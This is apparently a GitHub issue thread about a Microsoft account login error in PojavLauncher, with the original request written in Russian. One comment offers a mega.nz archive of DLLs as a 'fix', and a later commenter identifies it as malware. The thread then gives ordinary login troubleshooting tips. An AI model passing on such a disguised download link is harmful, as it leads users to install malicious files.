### ISSUE TITLE
Я не могу зайти в Майнкрасофт аккаунт мне выдаёт ошибку 

### ISSUE THREAD

**Issue by Grha009** [PojavLauncherTeam/PojavLauncher#6076]
### Is this request related to a bug?

Мне выдаёт ошибку 

### Describe the request.

Как зайти без ошибки 

### Anything else?

Помогите

**Comment by miguellords** [comment]
This might help:This file might fix it

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by GaucovyAero** [comment]
this file is malware ^
i have already reported it to github

**Comment by GaucovyAero** [comment]
to fix your login issues, log into minecraft.net, sometimes just logging into the site fixes the issue, but check these things:

a) you must own minecraft java edition
b) you must have a username set (check this if you are using Xbox Game Pass)
c) your account should not be classified as a child member of a family, otherwise it might not work
d) if the error is different and links you somewhere, try following the steps there
